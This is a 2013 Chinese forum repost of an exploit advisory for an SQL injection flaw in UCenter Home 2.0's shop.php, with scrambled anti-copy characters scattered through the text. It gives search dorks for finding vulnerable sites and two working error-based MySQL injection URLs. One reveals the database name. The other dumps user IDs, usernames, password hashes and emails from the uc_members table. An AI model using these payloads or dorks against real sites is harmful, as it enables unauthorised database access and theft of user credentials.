找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2056|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
. P+ l3 [0 C. P2 B. @
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
1 q+ \- p8 A* J  \+ m5 H& V0 c6 N! w6 ~; Z# P7 l+ }
                                 
" M' y% a2 _% r0 d
5 g* L/ G( ]7 }9 T+ p  A1 ]*/ Author : KnocKout  , [/ G& _" d) j4 [0 J7 V+ {! `
* ^! R7 [9 J- n6 y! @7 F$ T- H& l2 ~
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
  r# X: A, Q! C3 L
; @4 o8 C: @* ?. k*/ Contact: knockoutr@msn.com  / z% v: e' U- A8 `

! q  |( S& ]: {" E5 x*/ Cyber-Warrior.org/CWKnocKout  9 _; D/ X4 u& i# }, Y
& P- d1 O4 }* g7 i& Q- P
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  4 C9 v* L- a9 r3 t* i2 C
% V4 P4 W  Z3 G$ ]
Script : UCenter Home  
/ n" @1 ^* K% w& \/ N" M( h: B8 t# l2 p7 d* B1 ~& X% _- p
Version : 2.0  
6 |+ y1 ~( G" `7 h5 U+ v4 A; V$ _5 [# c% v
Script HomePage : http://u.discuz.net/  
6 R+ O; W+ t, f, l: @" |/ }$ q; _; a3 w: Y
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
/ s0 d+ ^" y/ @+ N3 j3 f* r# d  t# |  A- `$ S6 D
Dork : Powered by UCenter inurl:shop.php?ac=view  
& j* l! {/ L& d4 H& R; S
* R  H3 \! i9 j! z, GDork 2 : inurl:shop.php?ac=view&shopid=  9 x" U. i9 C, l0 b
% j7 e0 l+ H* h1 p: U
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
1 O8 H: v1 j  _- b2 b1 _* R& G% \+ S3 u+ Q
Vuln file : Shop.php  . ?+ o! F$ N7 T

3 v6 ?7 l3 \( _. C: t& m1 X( f4 bvalue's : (?)ac=view&shopid=  9 r( ^$ S; _9 l% \' X4 T* m" h
8 \: O; [0 J8 v" f; V2 p
Vulnerable Style : SQL Injection (MySQL Error Based)  
  v7 F2 x; I6 Z
$ X; `' {& Q* R7 i  c7 o8 _Need Metarials : Hex Conversion  9 g8 G: x2 }2 a" d0 V4 }+ @
+ V+ L5 }- _! G8 A1 D; Q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  6 J* B0 _) ~* O5 c

$ \! [! [3 L. V! iYour Need victim Database name.   
; z( L: S' [* S6 P* y+ j" ~: D9 V8 r6 H2 S( U
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  & [- n# A+ M: b( o$ D
6 G2 y/ I9 v/ @
..  
0 L. _) \9 i8 ~9 _$ g+ e. e9 |! R# N: Q. Q' k+ k/ p
DB : Okey.    e- X6 I8 n$ N/ h- @- U  L7 \
; J% A4 Z% }8 w% b% O$ |
your edit DB `[TARGET DB NAME]`  : V. ?/ R+ D& y

5 p& \/ C, N. ?* q* L* [) ?0 @+ D, r4 eExample : 'hiwir1_ucenter'  , O. l, Q4 l3 \! F) k
: @; E' p4 M! X+ @- l" U8 m6 m* v
Edit : Okey.  0 _- V, S8 m2 m3 s3 N3 _8 [7 [
- ~* q: J8 N9 t* ~7 w: c% }
Your use Hex conversion. And edit Your SQL Injection Exploit..  
- J  ?2 G1 t( m% ?4 R, K  x$ C1 d2 P) a! B& \
   1 _3 l3 Y( [3 o" ]
' ~; q1 [9 O; O
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
* \% B) a" B" n! [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表